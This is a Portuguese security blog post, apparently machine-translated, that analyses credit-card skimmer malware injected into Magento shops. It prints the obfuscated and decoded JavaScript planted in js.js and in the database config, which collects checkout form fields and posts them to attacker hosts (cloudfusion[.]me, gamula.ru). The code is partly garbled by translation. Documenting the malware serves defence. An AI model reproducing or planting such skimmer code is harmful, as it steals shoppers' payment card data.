Nos últimos meses, percebemos um aumento nos ataques visando plataformas de comércio eletrônico com o objetivo de roubar informações de cartões de crédito. Vimos um aumento semelhante no ano passado após o fim do verão e acreditamos que essa tendência continuará agora que a temporada de férias se aproxima rapidamente.
A maioria desses ataques baseia-se na interceptação da comunicação entre a loja online e o gateway de pagamento (o processo de pagamento) para enviar informações valiosas ao atacante. Mesmo que o site de comércio eletrônico aproveite um gateway de pagamento confiável, os invasores podem redirecionar os clientes para um processo de pagamento malicioso se o próprio site estiver comprometido.
Neste artigo, iremos publicar outra variante interessante de CC Stealer contra uma instalação do Magento.
Injeções em arquivos JavaScript e DB
Depois de comprometer o site, os invasores injetaram o seguinte código no arquivo: /js/varien/js.js
jQuery (função (t) {t ("botão"). on ("clique", função () {q = "h =" + window.location.href, q.match
(/ onepage | checkout / gi) && (t ("input, select"). cada (function () {t (this) .val ()? q + = "&" + t (este)
.attr ("nome") + "=" + t (este) .val (): ""}), t.post (t ("<div />").html("ht ; & # 116; & # 112; &
# 115; & # 58; & # 47; & # 47; & # 99; & # 108; & # 111; & # 117; & # 100; & # 102; & # 117; & # 115; & # 105; & # 105; ; & # 111; & # 110; & # 46;
& # 109; & # 101; & # 47; & # 99; & # 100; & # 110; & # 47; & # 106; & # 113; & # 117; & # 101; & # 114; & # 121; & # 46; & # 109; & # 105;
& # 110; & # 46; & # 106; & # 115; "). Text (), q))})}); </ script> <script src =" hxxp: // website [.] Com / js / varien / js.js "> </ script>
<script src = "hxxp: // site [.] com / js / varien / form.js"> </ script>
Depois de descodificar os caracteres HTML, obtemos a seguinte função fingindo fazer parte do jQuery:
jQuery (função (t) {
t ("botão"). on ("clique", função () {
q = "h =" + window.location.href, q.match (/ onepage | payout / gi) && ( t ("entrada, selecione"). cada (função ()
{t (este) .val ()? q + = "&" + t (este) .attr ("nome") + "=" + t (isto ) .val (): ""}
), t.post (t ("<div />").html("hxxps://cloudfusion[.]me/cdn/jquery.min.js") .text ( ), q))
})
});
Este código malicioso verifica se o URL corresponde a uma página ou a uma folha de pagamento (página de processo de pagamento). Se o fizer, os valores de entrada são enviados através de uma solicitação $ _POST para o endereço remoto hxxps: // cloudfusion [.] Me / cdn / jquery.min.js
Além da injeção de arquivos, os atacantes também adicionaram a seção core_config_data (design / head / includes) do banco de dados. Esses trechos garantem uma verificação constante desses URL, garantindo que a entrada sensÃvel seja retransmitida para o atacante.
Magento DB Credit Card Stealer
Durante a nossa investigação, também encontramos um tipo diferente de infecção por Magento na mesma loja online. Este malware adiciona uma camada extra ao ataque que colhe os números do cartão de crédito continuamente e os armazena em um local remoto ( gamula.ru ). Este é outro dos servidores usados ​​para coletar dados sem que o cliente ou o proprietário do site saibam.
O código a seguir foi identificado no banco de dados e redireciona o cliente para uma página de verificação falsa. Depois de inserir seu número de cartão de crédito, tipo de cartão de crédito e o número de verificação do cartão, todos os dados do formulário são colhidos e enviados de volta para o atacante.
...
} var http = new XMLHttpRequest (); http.open ("POST", " https://gamula ", true); http.setRequestHeader ("Content-type", "application / x-www-form-urlencoded");
http.send ("dados =" + snd + "& asd =" + asd + "& id_id = website.com "); console.clear (); Â Â Â } Â Â Â snd = null; Â Â Â setTimeout ('send ()', 150); }
...
Neste ponto, os hackers criaram com sucesso um ataque que modifica a página de pagamento do site legÃtimo, levando os usuários a inserir seus dados de pagamento e informações em uma página falsa de pagamento.
Se o usuário não tiver conhecimento de que eles foram redirecionados para https://gamula – todos os dados que eles inserem são enviados para o invasor onde ele pode ser usado para fins maliciosos. O dono da loja Magento neste caso nunca vê a venda e pode ter que considerar os impactos na conformidade do PCI .
Conclusão
Esta é uma das muitas técnicas de injeção que os invasores usaram nos sites de comércio eletrônico Magento para roubar dados do cartão de crédito. Este incidente demonstra que não há como evitar o roubo de dados se seu site for pirateado.
Há mais segurança de comércio eletrônico que os gateways de pagamento seguros. Para reduzir o risco de isso acontecer na sua loja on-line, recomendamos manter todo o software atualizado (temas, módulos, arquivos principais), usando um Firewall de Aplicação do site e possuindo um sistema de monitoramento de integridade de arquivos para alertá-lo de quaisquer modificações não autorizadas para seu site.
